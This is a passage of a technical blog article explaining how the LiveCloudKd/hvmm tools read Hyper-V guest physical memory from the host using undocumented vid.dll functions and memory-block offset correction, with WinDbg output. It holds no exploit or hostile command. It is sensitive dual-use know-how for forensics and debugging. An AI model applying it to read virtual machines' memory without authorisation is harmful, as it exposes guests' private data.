<span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #6f008a; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">__in</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #2b91af; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">MB_HANDLE</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: grey; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">MemoryBlock</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">,</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #6f008a; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">__in</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #2b91af; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">MB_PAGE_INDEX</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: grey; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">StartMbp</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">,</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #6f008a; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">__in</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #2b91af; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">UINT64</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: grey; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">MbpCount</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">,</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #6f008a; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">__out_bcount</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(</span><span style="background-color: transparent; color: grey; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">BufferSize</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">) </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #2b91af; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PVOID</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: grey; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ClientBuffer</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">,</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #6f008a; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">__in</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #2b91af; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">UINT64</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: grey; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">BufferSize</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Partition parameter – it is user mode partition handle;</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ClientBuffer – pointer to memory region, where result will be stored;</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">BufferSize – yes, buffer size, and nothing more;</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Two parameters can cause some questions: MemoryBlock and StartMbp. MemoryBlock is number of the MBlock object from which data will be read. In Windows Server 2008 R2 kernel-mode handle must be pointed as that parameter (yes, the user mode application contained kernel mode descriptor addresses - the original version of LiveCloudKd was built on this logic):</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<a href="https://github.com/comaeio/LiveCloudKd/blob/07ac5901ff5cac5258033f1dd95cfc2bd0e06815/hvdd/memoryblock.c#L159" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">https://github.com/comaeio/LiveCloudKd/blob/07ac5901ff5cac5258033f1dd95cfc2bd0e06815/hvdd/memoryblock.c#L159</span></a><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> (buffer contains memory of vmwp.exe)</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 98px; overflow: hidden; width: 244px;"><img height="98" src="https://lh4.googleusercontent.com/XmkUKzsZ0RcwbIvgN7XlgFOpxdAI8flDcheg7stuIHr8fpw83XrR6gbAkklUHeM2P35M1aMzO2QRzpTYhffEYmQazZPcuup_zqoF8Z15U5hCbMrDGtHElvRQoptRsEBOWLizsNQ" style="margin-left: 0px; margin-top: 0px;" width="244" /></span></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">StartMbp is index, which is equal to physical memory page number. We just need to get the GPA and divide it into PAGE_SIZE (0x1000). The page size in this case is virtual. For example, when ntoskrnl.exe image memory page is usually 2 Mb LARGE_PAGE, but the page numbers will still be 4 Kb granular for that region. Buffer can be specified less, then less data will be written to it. Everything is clear, with one exception - this index is relative to the beginning of MB_HANDLE MemoryBlock. For example, for the first memory block, index will match with physical memory page number. If blocks are placed continuously, index of second block will be equal to page number minus first block size. Index of third block will be equal to page number minus the size of the first block and minus the size of the second block. Everything seems to be clear. The main problem is that physical memory blocks are not continuous. Moreover, these boundaries cannot be easily determined from the user mode. Microsoft didn’t provide such APIs even from the time of Windows Server 2008 R2.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 357px; overflow: hidden; width: 441px;"><img height="357" src="https://lh3.googleusercontent.com/2DleH1sU5W-tv31uPVOi1bN2HigMTJPt1vleaVrObRiNDWCA-ZihuHvFAHRXrvwds6nWZKPRkPxER2RebNYEAuo_ZM2CjbEUGUPHoowQMDJYBDdG2V8th9dYBZilkwsSV5a5Om8" style="margin-left: 0px; margin-top: 0px;" width="441" /></span></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Matt used a separate function for searching descriptors in memory, but Microsoft closed this opportunity by replacing the descriptors with their indexes in the table, located in kernel mode, and therefore I used vid.dll! VidReadMemoryBlockPageRange function. </span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 101px; overflow: hidden; width: 563px;"><img height="101" src="https://lh3.googleusercontent.com/qnofeEua80IAysi1uFreBbb8ZUgVO71IbK4U_eb_FEhua1q25S1GHyEQehMinAu1P66YawvQVgz5lUfuu3bX2KUxW9dE9p1Fr2rkTWnn2C9XW5XnLXzlMGjcTCGV5WxRrghGWy0" style="margin-left: 0px; margin-top: 0px;" width="563" /></span></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">First, we can get the HANDLE numbers by doing a simple search, reading first memory page of each block. If function returns TRUE – it means, that block exists, if FALSE - block doesn’t exist. Based on practical experience, I determined the maximum size of the index to be 0x400. As we saw above, a large number of indexes are observed only for containers such as WDAG and Windows Sandbox, due to the fact that each file is mapped in a separate block.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">When we get array with indexes, we have could determine maximum block size by slightly modifying the binary searching algorithm in the array.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 237px; overflow: hidden; width: 485px;"><img height="237" src="https://lh5.googleusercontent.com/UlkhzfSi7t_5QIaB89b-ENSuyIOSljcAiX5aqoa380XPTFI1Zl04azyuNoW37yFLd_RIWqlnFKLFUU9SGmb5MvI7yWEkj-nVwloBl-SxxlmQMtSUCflnuSRhEUGaqjQDLJ8MIbc" style="margin-left: 0px; margin-top: 0px;" width="485" /></span></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">We know, that memory block is continuous, therefore we can determine its boundary by setting the condition: when reading a block, the subsequent block shouldn’t be read. Accordingly, first we can scan the memory and build the initial memory mapping scheme. But, as I wrote above, there are gaps between the blocks, and therefore, to clarify the memory allocation, we will have to examine the _PHYSICAL_MEMORY_DESCRIPTOR structure in guest OS.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">0: kd> dt poi(nt!MmPhysicalMemoryBlock) nt!_PHYSICAL_MEMORY_DESCRIPTOR</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x000 NumberOfRuns : 7</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x008 NumberOfPages : 0xbfee1</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x010 Run : [1] _PHYSICAL_MEMORY_RUN</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">0: kd> dq poi(nt!MmPhysicalMemoryBlock) L20</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffff8b81`91615020 00000000`0000000</span><span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">7</span><span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 00000000`</span><span style="background-color: white; color: red; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">000bfee1 </span><span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">– </span><span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">all blocks count</span><span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, </span><span style="background-color: white; color: red; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">summary blocks size</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffff8b81`91615030 00000000`0000000</span><span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">1</span><span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 00000000`000000</span><span style="background-color: white; color: red; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">9f</span><span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> – </span><span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">start position of block</span><span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, </span><span style="background-color: white; color: red; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">page count in block</span><span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffff8b81`91615040 00000000`00000100 00000000`0000027b</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffff8b81`91615050 00000000`0000037d 00000000`00005d86</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffff8b81`91615060 00000000`00006105 00000000`00058dc0</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffff8b81`91615070 00000000`0005ef1b 00000000`00001080</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffff8b81`91615080 00000000`0005ffff 00000000`00000001</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffff8b81`91615090 00000000`00060200 00000000`00060000</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinDBG has command to show PHYSICAL_MEMORY_DESCRIPTOR structure.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 169px; overflow: hidden; width: 536px;"><img height="169" src="https://lh3.googleusercontent.com/QbOONv75pIxBQAdjMN14M-vLbq_U_heDiFVHtaY6hRLH1gU4MU3xaxguBevhKEcHFC4f8b_H0ERi3z29CJYxFBhiWY_RMnppm0RwHrEMW2LNXpuYRtO4tZWsf6F53-LMxRIIGVE" style="margin-left: 0px; margin-top: 0px;" width="536" /></span></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">As you can see, part of the guest OS memory blocks fits in one block allocated by the hypervisor. And part of the blocks of the guest OS correspond to the blocks allocated by the hypervisor, with the same volume, but with some offset. Given that the offset is small, we can adjust our table:</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 278px; overflow: hidden; width: 525px;"><img height="278" src="https://lh5.googleusercontent.com/eMNyN_3nOSdKGhs_M-dyqz2gPiE9oN8ljr8DRFnr7WYVlcBFac1Xhjne50Cnj_zs6oPrSZZf3pq81FvJZ7urmqgQtvc0jc225G4gDUNP6VP648yC_Yh4vbvmtF-yBdFsOrb7KM8" style="margin-left: 0px; margin-top: 0px;" width="525" /></span></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The first block isn’t need for adjustment. Memory is mapping 1 in 1, which allows us to read data from the first block, where ntoskrnl.exe is located, in order to calculate the values ??of the _PHYSICAL_MEMORY_DESCRIPTOR structure later. After calculation, we can perform the offset correction. I described in driver code the case, when one guest block can consist of several blocks, allocated by the hypervisor, but I haven’t encountered such case in my stand. The last of the blocks with a size of 0x800 pages is used for video memory, as was explained above. In our case, in a virtual machine, the maximum physical address available for reading is greater than maximum address, specified in PHYSICAL_MEMORY_DESCRIPTOR. This block is not specified in PHYSICAL_MEMORY_DESCRIPTOR, so we just assume, that it goes sequentially after the last guest OS block. Offset of this block can’t be determined without a driver in the host OS. We can assume, that this is memory used by the device, and it can be read, for example, by LiveCloudKd.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">After correction, we can read all physical guest OS memory without the driver, excepting pages. Which was paged in pagefile.sys.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">I complete code description on that point. The remaining details can be found in sources of hvmm driver.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Additional details</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">I wrote PyKD script ParsePrtnStructure.py for better visualization of GPAR objects and Mblock objects (link is given at the beginning of the article). For using it, you have to find partition handle first. To do this, run hvmm.sys driver, which outputs the value of this descriptor to the debugger and then inserted this value into the script.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Script output for Windows Server 2019 guest OS:</span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
